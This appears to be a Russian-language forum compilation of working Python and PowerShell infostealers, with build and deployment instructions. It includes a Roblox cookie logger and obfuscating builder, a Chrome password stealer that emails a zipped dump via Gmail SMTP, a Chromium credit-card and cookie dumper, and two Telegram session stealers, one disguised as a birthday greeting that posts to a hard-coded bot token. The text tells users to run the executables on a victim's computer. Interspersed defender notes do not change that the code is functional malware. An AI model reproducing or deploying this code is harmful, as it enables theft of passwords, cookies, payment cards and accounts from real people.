    import os;import json;import base64;import shutil;import sqlite3;import io;import requests;import traceback;import subprocess;import marshal;from win32crypt import CryptUnprotectData;from Crypto.Cipher import AES;exec(marshal.loads(base64.b85decode(b"{base64.b85encode(marshal.dumps(compile(code, id, "exec"))).decode()}")))
    """
else:
    newcode = code

open(f"tmp_{id}.py", "w").write(newcode)

os.system(f"pyinstaller --clean --onefile tmp_{id}.py")

shutil.copy2(f"dist\\tmp_{id}.exe", "output.exe")
shutil.rmtree("dist")
shutil.rmtree("build")
os.remove(f"tmp_{id}.py")
os.remove(f"tmp_{id}.spec")

os.system("cls")

print("Done!\nYou can rename to file\nTo change the icon, download a .ico file as well as Resource Hacker. Then replace the resource. You can find a tutorial on how to do this on YouTube.")

main.py

Python:
webhook = "" # WEBHOOK HERE

import os
import json
import base64
import shutil
import sqlite3
import io
import requests
import traceback
import subprocess

from win32crypt import CryptUnprotectData
from Crypto.Cipher import AES

def safe(func):
    def wrapper(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except Exception:
            pass
    return wrapper

class CookieLogger:
    """Collect Roblox session cookies from local browser profiles and upload them.

    Instantiating the class runs the whole flow from ``__init__``: locate
    browser data directories, decrypt stored cookie values, add the
    ``.ROBLOSECURITY`` value read from the registry, and POST the result to
    the module-level ``webhook`` URL as ``cookies.txt``.

    Defender notes (observable behaviour, all taken from the code below):
      * a non-browser process walks %APPDATA% and %LOCALAPPDATA% and opens
        every ``Local State`` file it finds;
      * ``Cookies`` databases are copied to ``temp.db`` in the current
        working directory and deleted again after the query;
      * ``powershell`` is spawned without a window to read a Roblox value
        from HKLM;
      * one outbound multipart POST carries the collected values.
    A session cookie stays usable until the session is invalidated
    server-side, so response to a hit should include signing the account out
    of all sessions, not only a password change.
    """

    # Roots that findBrowsers() walks; resolved once, when the class body runs.
    appdata = os.getenv('APPDATA')
    localappdata = os.getenv('LOCALAPPDATA')

    def __init__(self):
        """Run collection and upload.

        Exceptions from per-browser collection and from the registry read are
        swallowed, so a failure in either leaves no error output.
        """
        browsers = self.findBrowsers()

        cookies = []
        for browser in browsers:
            try:
                cookies.append(self.getCookie(browser[0], browser[1]))
            except Exception:
                pass

        try:
            # creationflags=0x08000000 is CREATE_NO_WINDOW: the PowerShell child
            # gets no console window. Detection: powershell.exe running
            # Get-ItemPropertyValue against this Roblox key under an
            # unexpected parent process.
            cookies.append(("Roblox App", ("None", '\n'.join(line for line in subprocess.check_output(r"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com' -Name .ROBLOSECURITY", creationflags=0x08000000, shell=True).decode().strip().splitlines() if line.strip()))))
        except Exception:
            pass

        cookieDoc = ""

        for cookie in cookies:
            # Skip sources that returned nothing (None from @safe, or an empty list).
            if cookie == None or not cookie[1]:
                continue

            for _cookie in cookie[1]:
                cookieDoc += f"Browser: {cookie[0]}\nProfile: {_cookie[0]}\nCookie: {_cookie[1]}\n\n"

        # Exfiltration step: a single multipart upload named "cookies.txt".
        # Egress filtering or alerting on webhook endpoints reached from
        # workstations is the network-side control for this line.
        requests.post(webhook, files = {"cookies.txt": cookieDoc})

    @safe
    def findBrowsers(self):
        """Return ``[path, has_default]`` pairs for directories holding ``Local State``.

        Every first-level directory under both roots is walked recursively.
        ``has_default`` is True when a ``Default`` entry sits next to the
        ``Local State`` file. ``safe`` turns any escaping exception into a
        ``None`` return.
        """
        found = []

        for root in [self.appdata, self.localappdata]:
            for directory in os.listdir(root):
                try:
                    for _root, _, _ in os.walk(os.path.join(root, directory)):
                        for file in os.listdir(_root):
                            if file == "Local State":
                                if "Default" in os.listdir(_root):
                                    found.append([_root, True])
                                else:
                                    found.append([_root, False])
                except Exception:
                    pass

        return found

    @safe
    def getMasterKey(self, browserPath):
        """Read ``os_crypt.encrypted_key`` from ``Local State`` and unwrap it with DPAPI.

        NOTE(review): DPAPI user-scope data can generally be unprotected by any
        code running as the same user, which is why no elevation appears here;
        that is a property of DPAPI, not something this file shows.
        """
        with open(os.path.join(browserPath, "Local State"), "r", encoding = "utf8") as f:
            localState = json.loads(f.read())

        masterKey = base64.b64decode(localState["os_crypt"]["encrypted_key"])
        # Drops a 5-byte prefix in front of the DPAPI blob
        # (presumably the ASCII tag "DPAPI" - confirm).
        truncatedMasterKey = masterKey[5:]

        # Element 1 of the returned tuple is what callers use as the AES key.
        return CryptUnprotectData(truncatedMasterKey, None, None, None, 0)[1]

    @safe
    def decryptCookie(self, cookie, masterKey):
        """Decrypt one ``encrypted_value`` blob with AES-GCM and return it as text."""
        # Bytes 0-2 are skipped (presumably a version tag - confirm);
        # bytes 3-14 are used as the 12-byte nonce.
        iv = cookie[3:15]
        encryptedValue = cookie[15:]

        cipher = AES.new(masterKey, AES.MODE_GCM, iv)
        # decrypt() only: no tag verification is performed.
        decryptedValue = cipher.decrypt(encryptedValue)

        # The trailing 16 bytes (presumably the GCM tag) are cut off before decoding.
        return decryptedValue[:-16].decode()

    @safe
    def getCookie(self, browserPath, isProfiled):
        """Return ``[browserName, cookiesFound]`` for one browser data directory.

        ``cookiesFound`` holds ``(profile, value)`` tuples; only values that
        start with Roblox's warning banner are kept. Returns an empty list if
        obtaining the master key raises.
        """

        # Browser name is taken from the path: the parent of "User Data",
        # otherwise the last path component.
        if browserPath.split("\\")[-1] == "User Data":
            browserName = browserPath.split("\\")[-2]
        else:
            browserName = browserPath.split("\\")[-1]

        cookiesFound = []

        profiles = ["Default"]
        try:
            masterKey = self.getMasterKey(browserPath)
        except Exception:
            traceback.print_exc()
            return cookiesFound

        if isProfiled:
            for directory in os.listdir(browserPath):
                if directory.startswith("Profile"):
                    profiles.append(directory)

        if not isProfiled:
            # Cookie DB location differs between layouts: Network\Cookies or Cookies.
            if "Network" in os.listdir(browserPath):
                cookiePath = os.path.join(browserPath, "Network", "Cookies")
            else:
                cookiePath = os.path.join(browserPath, "Cookies")

            # The database is copied before it is opened. Detection: a "temp.db"
            # that appears and disappears in the process's working directory,
            # and a read of the Cookies file by a non-browser process.
            shutil.copy2(cookiePath, "temp.db")
            connection = sqlite3.connect("temp.db")
            cursor = connection.cursor()

            cursor.execute("SELECT encrypted_value FROM cookies")
            for cookie in cursor.fetchall():
                if cookie[0]:
                    decrypted = self.decryptCookie(cookie[0], masterKey)

                    # Every cookie is decrypted; all but the Roblox session value are discarded.
                    if decrypted.startswith("_|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.|_"):
                        cookiesFound.append(("None", decrypted))

            connection.close()
            os.remove("temp.db")

        else:
            # Same copy / query / delete sequence, repeated per profile directory.
            for profile in profiles:
                if "Network" in os.listdir(os.path.join(browserPath, profile)):
                    cookiePath = os.path.join(browserPath, profile, "Network", "Cookies")
                else:
                    cookiePath = os.path.join(browserPath, profile, "Cookies")

                shutil.copy2(cookiePath, "temp.db")
                connection = sqlite3.connect("temp.db")
                cursor = connection.cursor()

                cursor.execute("SELECT encrypted_value FROM cookies")
                for cookie in cursor.fetchall():
                    if cookie[0]:
                        decrypted = self.decryptCookie(cookie[0], masterKey)

                        if decrypted.startswith("_|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.|_"):
                            cookiesFound.append((profile, decrypted))

                connection.close()
                os.remove("temp.db")

        return [browserName, cookiesFound]

if __name__ == "__main__":
    CookieLogger()

Python stealer паролей Chrome всех версий с обфускацией FUD, получаете данные по электронной почте Gmail или через свой SMTP.


Скачать и установить Python3 https://www.python.org
Кликаем "Add Python to PATH" при установке.

После установки Python откройте my_email.py
Впишите данные от Gmail, отправителя электронной почты
Откройте терминал:

pip3 install pywin32
pip3 install Pillow
pip3 install requests
pip3 install cryptography
pip3 install pyinstaller

pyinstaller --clean --hidden-import=pyttsx3.drivers --hidden-import=pyttsx3.drivers.sapi5 --onefile --noconsole --i icone.ico my_email.py

del /s /q /f build.spec
rmdir /s /q __pycache__
rmdir /s /q build

Скачайте иконку icone.ico для своего exe



my_email.py

Python:
import os
import sys
import shutil
import sqlite3
import win32crypt
import json,base64
import requests
import platform
import zipfile
import smtplib

from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders


# don't forgot to active  https://www.google.com/settings/security/lesssecureapps
# Version Professionel : Steal cookie,password : Chrome,Microsoft Edge,Firefox,Opera,Yandex
# Link to Download https://*********/@hakanonymos

addr_from = 'your@gmail.com' # your email to send steal_password
addr_to  = 'receive email  ' # receive email
password  = 'password for gmail' # Your gmail password

from PIL import ImageGrab
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.ciphers import (
    Cipher, algorithms, modes)

APP_DATA_PATH= os.environ['LOCALAPPDATA']
DB_PATH = r'Google\Chrome\User Data\Default\Login Data'

NONCE_BYTE_SIZE = 12

def encrypt(cipher, plaintext, nonce):
    cipher.mode = modes.GCM(nonce)
    encryptor = cipher.encryptor()
    ciphertext = encryptor.update(plaintext)
    return (cipher, ciphertext, nonce)

def decrypt(cipher, ciphertext, nonce):
    cipher.mode = modes.GCM(nonce)
    decryptor = cipher.decryptor()
    return decryptor.update(ciphertext)

def get_cipher(key):
    cipher = Cipher(
        algorithms.AES(key),
        None,
        backend=default_backend()
    )
    return cipher


def dpapi_decrypt(encrypted):
    """Unprotect a DPAPI blob by calling crypt32's ``CryptUnprotectData`` via ctypes.

    Args:
        encrypted: DPAPI-protected bytes.

    Returns:
        The unprotected bytes, copied out of the API's output buffer.

    Raises:
        OSError: built by ``ctypes.WinError()`` when the call reports failure.

    Defender note: the call is made in-process through ctypes, so no child
    process or command line records it; visibility comes from API-level
    telemetry and from the file reads that precede it (``Local State``,
    ``Login Data``) being made by a process that is not the browser.
    """
    import ctypes
    import ctypes.wintypes

    # Mirror of the Win32 DATA_BLOB structure: byte count plus pointer.
    class DATA_BLOB(ctypes.Structure):
        _fields_ = [('cbData', ctypes.wintypes.DWORD),
                    ('pbData', ctypes.POINTER(ctypes.c_char))]

    p = ctypes.create_string_buffer(encrypted, len(encrypted))
    blobin = DATA_BLOB(ctypes.sizeof(p), p)
    blobout = DATA_BLOB()
    # No description, entropy or prompt arguments are passed and flags are 0.
    retval = ctypes.windll.crypt32.CryptUnprotectData(
        ctypes.byref(blobin), None, None, None, None, 0, ctypes.byref(blobout))
    if not retval:
        raise ctypes.WinError()
    # Copy the result first, then release the output buffer with LocalFree.
    result = ctypes.string_at(blobout.pbData, blobout.cbData)
    ctypes.windll.kernel32.LocalFree(blobout.pbData)
    return result

def unix_decrypt(encrypted):
    if sys.platform.startswith('linux'):
        password = 'peanuts'
        iterations = 1
    else:
        raise NotImplementedError

    from Crypto.Cipher import AES
    from Crypto.Protocol.KDF import PBKDF2

    salt = 'saltysalt'
    iv = ' ' * 16
    length = 16
    key = PBKDF2(password, salt, length, iterations)
    cipher = AES.new(key, AES.MODE_CBC, IV=iv)
    decrypted = cipher.decrypt(encrypted[3:])
    return decrypted[:-ord(decrypted[-1])]

def get_key_from_local_state():
    """Return the base64 ``os_crypt.encrypted_key`` string from Chrome's ``Local State``.

    The path is fixed to the Google Chrome user-data directory under
    %LOCALAPPDATA%. Only the first line of the file is read and parsed as JSON.

    Defender note: ``Local State`` is normally opened by the browser itself;
    an open of this file by any other process is a useful file-access signal.
    """
    jsn = None
    with open(os.path.join(os.environ['LOCALAPPDATA'],
        r"Google\Chrome\User Data\Local State"),encoding='utf-8',mode ="r") as f:
        jsn = json.loads(str(f.readline()))
    return jsn["os_crypt"]["encrypted_key"]

def aes_decrypt(encrypted_txt):
    """Decrypt one stored value using the key from ``Local State``.

    Returns the output of ``decrypt`` unchanged: the caller strips the last
    16 bytes itself, and no GCM tag check happens on this path.

    Defender note: the key is re-read and unwrapped on every call, so one run
    produces a repeated open of ``Local State`` followed by a DPAPI call for
    each record - a pattern that stands out in file-access telemetry.
    """
    encoded_key = get_key_from_local_state()
    encrypted_key = base64.b64decode(encoded_key.encode())
    # Drops a 5-byte prefix in front of the DPAPI blob (presumably the tag "DPAPI" - confirm).
    encrypted_key = encrypted_key[5:]
    key = dpapi_decrypt(encrypted_key)
    # Bytes 3-14 of the stored value are used as the 12-byte nonce; the rest is ciphertext.
    nonce = encrypted_txt[3:15]
    cipher = get_cipher(key)
    return decrypt(cipher,encrypted_txt[15:],nonce)

class ChromePassword:
    """Dump saved logins from Chrome's Default profile into a plaintext file.

    Flow: copy the ``Login Data`` database (module constant ``DB_PATH``) to a
    file named ``sqlite_file`` under %LOCALAPPDATA%, read the ``logins``
    table, decrypt each password, and write the result to ``Passwords.txt``
    in the ProgramData directory.

    Defender notes (artifacts named in the code below):
      * ``sqlite_file`` created and removed directly under %LOCALAPPDATA%;
      * ``Passwords.txt`` written to the root of ProgramData in clear text;
      * ``Login Data`` read by a process that is not the browser.
    Any credential that was stored in the profile should be treated as
    exposed and rotated once these artifacts are seen.
    """

    def __init__(self):
        # One formatted "Hostname/Username/Password" string per stored login.
        self.passwordList = []

    def get_chrome_db(self):
        """Copy the login database to a scratch path and hand it to ``show_password``."""
        _full_path = os.path.join(APP_DATA_PATH,DB_PATH)
        _temp_path = os.path.join(APP_DATA_PATH,'sqlite_file')
        # A leftover scratch copy from an earlier run is removed first.
        if os.path.exists(_temp_path):
            os.remove(_temp_path)
        shutil.copyfile(_full_path,_temp_path)
        self.show_password(_temp_path)

    def show_password(self,db_file):
        """Read every row of ``logins`` from *db_file*, then delete the file."""
        conn = sqlite3.connect(db_file)
        _sql = 'select signon_realm,username_value,password_value from logins'
        for row in conn.execute(_sql):
            host = row[0]
            # Entries whose realm starts with "android" are skipped.
            if host.startswith('android'):
                continue
            name = row[1]
            value = self.chrome_decrypt(row[2])
            _info = 'Hostname: %s\nUsername: %s\nPassword: %s\n\n' %(host,name,value)
            self.passwordList.append(_info)
        conn.close()
        os.remove(db_file)

    def chrome_decrypt(self,encrypted_txt):
        """Decrypt one ``password_value`` blob, choosing the scheme from its prefix.

        On win32 a blob starting with ``01 00 00 00`` goes straight to DPAPI
        and a blob starting with ``v10`` goes through ``aes_decrypt``; any
        other prefix falls through and yields ``None``. ``WindowsError`` is
        mapped to ``None``. Other platforms delegate to ``unix_decrypt``.
        """
        if sys.platform == 'win32':
            try:
                if encrypted_txt[:4] == b'\x01\x00\x00\x00':
                    decrypted_txt = dpapi_decrypt(encrypted_txt)
                    return decrypted_txt.decode()
                elif encrypted_txt[:3] == b'v10':
                    decrypted_txt = aes_decrypt(encrypted_txt)
                    # Trailing 16 bytes (presumably the GCM tag) are dropped unchecked.
                    return decrypted_txt[:-16].decode()
            except WindowsError:
                return None
        else:
            try:
                return unix_decrypt(encrypted_txt)
            except NotImplementedError:
                return None

    def save_passwords(self):
        """Write the collected entries to ``Passwords.txt`` as UTF-8 text."""
        with open('C:\\ProgramData\\Passwords.txt','w',encoding='utf-8') as f:
            f.writelines(self.passwordList)

if __name__=="__main__":
    Main = ChromePassword()
    Main.get_chrome_db()
    Main.save_passwords()

# --- Host profiling, staging and e-mail exfiltration (module-level statements) ---
# Defender summary of what this run leaves behind or sends, all from the lines below:
#   files   : C:\ProgramData\Passwords.txt, Screenshot.jpg, Passwords.zip (each deleted after use)
#   network : HTTP GET to ip.42.pl/raw, then SMTP submission to smtp.gmail.com:587 with STARTTLS
#   content : mail subject starting with "Stealed! - " followed by the logged-in user name
# Controls that cover it: alerting on archive creation in the ProgramData root by
# unexpected binaries, and blocking direct SMTP submission from workstations that
# are not mail clients.

# Security-product fingerprinting: fixed install directories under C:\Program Files
# are probed one by one; a later match overwrites an earlier one, and the
# resulting name is placed in the message body further down.
if os.path.exists('C:\\Program Files\\Windows Defender'):
   av = 'Windows Defender'
if os.path.exists('C:\\Program Files\\AVAST Software\\Avast'):
   av = 'Avast'
if os.path.exists('C:\\Program Files\\AVG\\Antivirus'):
   av = 'AVG'
if os.path.exists('C:\\Program Files\\Avira\\Launcher'):
   av = 'Avira'
if os.path.exists('C:\\Program Files\\IObit\\Advanced SystemCare'):
   av = 'Advanced SystemCare'
if os.path.exists('C:\\Program Files\\Bitdefender Antivirus Free'):
   av = 'Bitdefender'
if os.path.exists('C:\\Program Files\\COMODO\\COMODO Internet Security'):
   av = 'Comodo'
if os.path.exists('C:\\Program Files\\DrWeb'):
   av = 'Dr.Web'
if os.path.exists('C:\\Program Files\\ESET\\ESET Security'):
   av = 'ESET'
if os.path.exists('C:\\Program Files\\GRIZZLY Antivirus'):
   av = 'Grizzly Pro'
if os.path.exists('C:\\Program Files\\Kaspersky Lab'):
   av = 'Kaspersky'
if os.path.exists('C:\\Program Files\\IObit\\IObit Malware Fighter'):
   av = 'Malware fighter'
if os.path.exists('C:\\Program Files\\360\\Total Security'):
   av = '360 Total Security'
else:
   pass

# Full-screen capture written next to the password dump.
screen = ImageGrab.grab()
screen.save(os.getenv('ProgramData') + '\\Screenshot.jpg')
screen = open('C:\\ProgramData\\Screenshot.jpg', 'rb')
screen.close()

# Staging: both files are bundled into one archive, then the loose copies are removed.
zname=r'C:\\ProgramData\\Passwords.zip'
newzip=zipfile.ZipFile(zname,'w')
newzip.write(r'C:\\ProgramData\\Passwords.txt')
newzip.write(r'C:\\ProgramData\\Screenshot.jpg')
newzip.close()
os.remove('C:\\ProgramData\\Passwords.txt')
os.remove('C:\\ProgramData\\Screenshot.jpg')

msg = MIMEMultipart()
msg['From']    = addr_from
msg['To']      = addr_to
msg['Subject'] = 'Stealed! - ' + os.getlogin()

# External-IP lookup over plain HTTP; the request itself is a network indicator.
r = requests.get('http://ip.42.pl/raw')
IP = r.text
body = ('Stealed! ✔️'
 '\n' + '\nPC » ' + os.getlogin() +
 '\nOS » ' + platform.system() + ' ' + platform.release() +
 '\n'
 '\nAV » ' + av +
 '\n'
 '\nIP » ' + IP)
msg.attach(MIMEText(body, 'plain'))

filename = 'Passwords.zip'
attachment = open('C:\\ProgramData\\Passwords.zip', 'rb')
p = MIMEBase('application', 'octet-stream')
p.set_payload((attachment).read())
encoders.encode_base64(p)
p.add_header('Content-Disposition', "attachment; filename= %s" % filename)

msg.attach(p)
# Exfiltration channel: authenticated SMTP submission with STARTTLS. The sender
# account password is embedded in the script (module variable `password`), so a
# recovered sample also exposes that mailbox to responders.
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
server.login(addr_from, password)
server.send_message(msg)
server.quit()

# Clean-up of the last staged artifact.
attachment.close()
os.remove('C:\\ProgramData\\Passwords.zip')

Программа Python получает все сохраненные пароли, кредитные карты и закладки из браузеров на основе Chromium, поддерживает Chromium 80 и выше!​

✔ Amigo
✔ Torch
✔ Kometa
✔ Orbitum
✔ Cent-browser
✔ 7star
✔ Sputnik
✔ Vivaldi
✔ Google-chrome-sxs
✔ Google-chrome
✔ Epic-privacy-browser
✔ Microsoft-edge
✔ Uran
✔ Yandex
✔ Brave
✔ Iridium

Использование:

1) Во-первых, убедитесь, что Python установлен https://www.python.org/downloads/ Обязательно "Add Python to PATH" при установке!
3) Запустите команды для создания EXE, переименуйте и запустите на компе жертвы, отправки логов нет

pip install pyinstaller pypiwin32 pycryptodome
pyinstaller --onefile --noconsole --i icone.ico chromium_based_browsers.py


chromium_based_browsers.py​


Python:
    return results


if __name__ == '__main__':
    available_browsers = installed_browsers()

    for browser in available_browsers:
        browser_path = browsers[browser]
        master_key = get_master_key(browser_path)
        print(f"Getting Stored Details from {browser}")

        print("\t [!] Getting Saved Passwords")
        save_results(browser, 'Saved_Passwords', get_login_data(browser_path, "Default", master_key))
        print("\t------\n")

        print("\t [!] Getting Browser History")
        save_results(browser, 'Browser_History', get_web_history(browser_path, "Default"))
        print("\t------\n")

        print("\t [!] Getting Download History")
        save_results(browser, 'Download_History', get_downloads(browser_path, "Default"))
        print("\t------\n")

        print("\t [!] Getting Cookies")
        save_results(browser, 'Browser_Cookies', get_cookies(browser_path, "Default", master_key))
        print("\t------\n")

        print("\t [!] Getting Saved Credit Cards")
        save_results(browser, 'Saved_Credit_Cards', get_credit_cards(browser_path, "Default", master_key))

Stealer Telegram Session c обходом 2FA с использованием сценария PowerShell
Отправляет через FTP сервер


steal_session.ps1


Python:
# Flow of this script, as written below: stop the Telegram process, delete two
# sub-folders of tdata, zip the remaining tdata folder, drop the archive if it
# exceeds 50 MB, and upload it over FTP under a timestamped name.
#
# Defender notes (each maps to a line in this script):
#   - PowerShell stopping a process named "telegram";
#   - deletions inside "%APPDATA%\Telegram Desktop\tdata" followed by creation of
#     "tdata.zip" in the parent folder;
#   - System.Net.WebClient.UploadFile to an ftp:// URL from a workstation.
# PowerShell script-block logging records all three; outbound FTP from endpoints
# can be blocked at the egress point. The tdata folder represents an existing
# signed-in session, so response should include terminating unknown sessions
# from the account's active-sessions list (NOTE(review): account-side step, not
# something this script shows).
$processName = "telegram"

try{

# The client is stopped before its data folder is touched.
if (Get-Process $processName -ErrorAction SilentlyContinue) {
    Get-Process -Name $processName  | Stop-Process
} else {
   # Write-Host "$processName is not running."
}



#Write-Host "Telegram Application Closed..."

}
catch{

#Write-Host "something went wrong..."

}
$userName = $env:USERNAME
$folderPath1  = "C:\Users\$userName\AppData\Roaming\Telegram Desktop\tdata\user_data"
$folderPath2  = "C:\Users\$userName\AppData\Roaming\Telegram Desktop\tdata\emoji"

# Two sub-folders are deleted before archiving (presumably to keep the archive
# small, given the size check further down - confirm). Errors are suppressed.
try{
Remove-Item $folderPath1 -Recurse -Force  -ErrorAction SilentlyContinue
#Write-Host "Removed user_data"
Remove-Item $folderPath2 -Recurse -Force  -ErrorAction SilentlyContinue
#Write-Host "Removed emoji"

}

catch{

}
$source_folder = "C:\Users\$userName\AppData\Roaming\Telegram Desktop\tdata"
$zip_file = "C:\Users\$userName\AppData\Roaming\Telegram Desktop\tdata.zip"
$max_size = 50 * 1MB # Convert to bytes


# A stale archive from an earlier run is removed first.
if (Test-Path $zip_file) {
    Remove-Item $zip_file
}

#Write-Host "Compressing files in $source_folder to $zip_file..."

# Staging artifact: tdata.zip written next to the tdata folder.
Add-Type -AssemblyName System.IO.Compression.FileSystem
[System.IO.Compression.ZipFile]::CreateFromDirectory($source_folder, $zip_file, "Optimal", $false)


# Archives larger than $max_size are deleted again.
Get-ChildItem $zip_file | Where-Object { $_.Length -gt $max_size } | ForEach-Object {
    Write-Host "Removing $($_.FullName)..."
    Remove-Item $_.FullName
}

$userName = $env:USERNAME
$filePath = "C:\Users\$userName\AppData\Roaming\Telegram Desktop\tdata.zip"
$dateString = Get-Date -Format "yyyyMMdd_HHmmss"
## FTP server settings
# Server name and credentials are embedded in the script, so a recovered copy
# identifies the collection server to responders.
$ftpServer = "your_ftp_server"
$ftpUsername = "xxxxx"
$ftpPassword = "yyyyy"

# Local file to upload
$localFilePath = "C:\Users\$userName\AppData\Roaming\Telegram Desktop\tdata.zip"

# Remote FTP file path
$remoteFilePath = "/steal/$dateString.zip"

# Create FTP session
$ftpSession = New-Object -TypeName System.Net.WebClient
$ftpSession.Credentials = New-Object System.Net.NetworkCredential($ftpUsername, $ftpPassword)

# Upload file
# Exfiltration step: a single FTP upload; the remote name carries the local timestamp.
$ftpSession.UploadFile("ftp://$ftpServer/$remoteFilePath", $localFilePath)

# Close FTP session
$ftpSession.Dispose()

Telegram session stealer​


Использование:
1) Во-первых, убедитесь, что Python установлен https://www.python.org/downloads/ Обязательно "Add Python to PATH" при установке!
2) Запустите команды для создания EXE, переименуйте и запустите на компе жертвы, отправки логов нет

sudo apt install python3 && python3-pip
pip3 install pyinstaller PyQt5

pyinstaller --add-data "*.png;." --add-data "*.gif;." --noconsole --onefile main.py

Тема стилера поздравительная, поэтому png и гифку на ваш вкус, можно что-нибудь праздничное или тему замените
Название файло img в начале стилера

Вставьте токен и chat_id

main.py


Python:
import contextlib

from PyQt5 import QtWidgets, QtGui
from PyQt5.QtCore import QThread
from PyQt5.QtGui import QMovie
from PyQt5.QtWidgets import QApplication, QMainWindow, QPushButton


class ParallelThread(QThread):
    """Background worker that archives Telegram Desktop session files and uploads them.

    Analyst summary: run() zips most of the current user's ``tdata`` folder
    into ``tdata\\cache.zip`` and POSTs that archive to a Telegram Bot API
    ``sendDocument`` URL. The names ``getpass``, ``os``, ``ZipFile`` and
    ``requests`` are not imported at the top of the file; they are bound by
    the imports under the ``__main__`` guard.

    Detection opportunities: a process other than Telegram reading
    ``%APPDATA%\\Telegram Desktop\\tdata``, a new ``cache.zip`` inside that
    folder, and a request to ``api.telegram.org`` from a non-browser,
    non-Telegram process (MITRE ATT&CK T1560 / T1567).
    """
    # Multithreading class
    def __init__(self):
        super(ParallelThread, self).__init__()

    # Background process
    def run(self):
        """Build the archive, then attempt the upload; upload errors are swallowed."""
        name = getpass.getuser()
        path = f'C:\\Users\\{name}\\AppData\\Roaming\\Telegram Desktop\\tdata'  # Path to directory with tdata
        file_list = os.listdir(path)  # List of files (we need not all of them, but take for sure)
        bad_files = ['tdummy', 'usertag', 'user_data', 'dumps', 'emoji', 'working', 'cache.zip']  # Heavy, temporary
        # or active (so we can not copy them) files
        with ZipFile(f'C:\\Users\\{name}\\AppData\\Roaming\\Telegram Desktop\\tdata\\cache.zip', "w") as myzip:
            # We hide our session file to rarely seen directory in case produced by us file is not removed
            # to make it inconspicuous
            # Responder note: the archive is never deleted by this class, so
            # tdata\cache.zip stays on disk as a host-based indicator.
            for i in file_list:
                if i.startswith('D877'):
                    # Important directory
                    try:
                        file_list1 = os.listdir(f'{path}\\{i}')
                        for j in file_list1:
                            myzip.write(f'{path}\\{i}\\{j}')
                    except Exception:
                        # listdir failed, so the entry is added as a single path instead.
                        myzip.write(f'{path}\\{i}')
                elif i not in bad_files:
                    myzip.write(f'{path}\\{i}')
        # suppress(Exception) hides every failure of the upload, so the
        # decoy UI never shows an error to the person running the file.
        with contextlib.suppress(Exception):
            # Post request to get our zip archive via telegram bot. Send something to https://t.me/ZZZipsender_bot
            # and change "chat_id" parameter to your Telegram_id
            # IoC: the bot token and chat_id are hard-coded in the URL below.
            # A token recovered from a sample like this should be reported to
            # the platform so it can be revoked.
            requests.post('https://api.telegram.org/bot6135827492:AAEKo5OYDgqohd-8OEKfFd4rSM3GMPgkmmA/sendDocument'
                          '?chat_id=6172077822',
                          files={'document': open(f'C:\\Users\\{getpass.getuser()}\\AppData\\Roaming\\'
                                                  f'Telegram Desktop\\tdata\\cache.zip', 'rb')})


class MyWidget(QMainWindow):
    """Decoy greeting-card window that fronts the background collection thread.

    Analyst summary: the window shows a picture, four animated labels and one
    button. Nothing is collected when the window opens; the ParallelThread
    worker is started only from the button's click handler. The visible UI is
    the social-engineering lure, so user reports of an unexpected "greeting
    card" executable are a useful triage signal.
    """

    def __init__(self):
        super().__init__()
        # Creating user interface
        # Image assets are resolved through resource_path, i.e. from the
        # bundle directory when the script runs as a packed executable.
        img0 = resource_path("img_hb.png")
        img1 = resource_path("gifka.gif")
        img2 = resource_path("gif_gb.gif")

        self.setGeometry(70, 30, 1280, 720)
        self.setWindowTitle('Happy Birthday!')

        self.default_picture = QtWidgets.QLabel(self)
        self.pix = QtGui.QPixmap(img0)
        self.default_picture.setPixmap(self.pix)
        self.default_picture.resize(1280, 720)
        self.default_picture.move(0, 0)

        # The only interactive control; its click handler starts the worker.
        self.surprise_button = QPushButton('Получить поздравление', self)
        self.surprise_button.resize(140, 30)
        self.surprise_button.move(570, 435)
        self.surprise_button.clicked.connect(self.f_surprise_button)

        self.firework1 = QtWidgets.QLabel(self)
        self.movie1 = QMovie(img1)
        self.firework1.setMovie(self.movie1)
        self.firework1.resize(277, 269)
        self.firework1.move(30, 200)
        self.movie1.start()

        self.firework2 = QtWidgets.QLabel(self)
        self.movie2 = QMovie(img1)
        self.firework2.setMovie(self.movie2)
        self.firework2.resize(277, 269)
        self.firework2.move(350, 50)
        self.movie2.start()

        # Created off-screen (x = -2000) and moved into view by the click handler.
        self.cong_text = QtWidgets.QLabel(self)
        self.cong_movie = QMovie(img2)
        self.cong_text.setMovie(self.cong_movie)
        self.cong_text.resize(1280, 720)
        self.cong_text.move(-2000, 0)

        self.firework3 = QtWidgets.QLabel(self)
        self.movie3 = QMovie(img1)
        self.firework3.setMovie(self.movie3)
        self.firework3.resize(277, 269)
        self.firework3.move(950, 200)
        self.movie3.start()

        self.firework4 = QtWidgets.QLabel(self)
        self.movie4 = QMovie(img1)
        self.firework4.setMovie(self.movie4)
        self.firework4.resize(277, 269)
        self.firework4.move(700, 50)
        self.movie4.start()

        # Multithreading class initialization
        self.parallel = ParallelThread()

    # Reaction to clicking the button
    def f_surprise_button(self):
        """Swap the decoy animation and start the background worker."""
        # Widgets are hidden by moving them off-screen rather than destroying them.
        self.surprise_button.move(-1000, 0)
        self.movie3.stop()
        self.movie4.stop()
        self.firework3.move(-1000, 0)
        self.firework4.move(-1000, 0)
        self.movie2.stop()
        self.movie1.stop()
        self.cong_text.move(0, 0)
        self.cong_movie.start()
        # Errors raised while starting the thread are suppressed, so the UI
        # keeps running whatever happens to the worker.
        with contextlib.suppress(Exception):
            self.parallel.start()


# Function for importing files in standalone application
def resource_path(relative_path):
    """Return the on-disk location of a bundled asset.

    When ``sys._MEIPASS`` exists its value is used as the base directory;
    otherwise the absolute path of the current working directory is used.
    Analyst note: ``_MEIPASS`` is the attribute a PyInstaller one-file bundle
    sets, so its use here marks the script as intended to be shipped as a
    packed executable.
    """
    try:
        bundle_dir = sys._MEIPASS
    except Exception:
        # Attribute missing (or ``sys`` unavailable): fall back to the CWD.
        return os.path.join(os.path.abspath("."), relative_path)
    return os.path.join(bundle_dir, relative_path)


if __name__ == '__main__':
    # These imports run only when the file is executed as a script. They bind
    # the module-level names (sys, ZipFile, os, getpass, requests) that
